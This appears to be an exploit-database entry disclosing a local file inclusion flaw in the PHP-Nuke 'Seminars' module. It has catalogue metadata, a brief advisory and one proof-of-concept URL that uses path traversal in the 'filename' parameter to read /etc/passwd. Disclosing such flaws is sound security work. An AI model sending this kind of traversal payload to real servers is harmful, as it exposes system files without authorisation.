PHP-Nuke 'Seminars' Module - 'Filename' Local File Inclusion

Author: The-0utl4w
type: webapps
platform: php
port: 
date_added: 2008-03-04 
date_updated: 2014-02-02 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/28089/info

The PHP-Nuke 'Seminars' module is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

Exploiting this issue may allow an unauthorized remote user to view files and execute local scripts in the context of the webserver process.

http://www.example.com/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd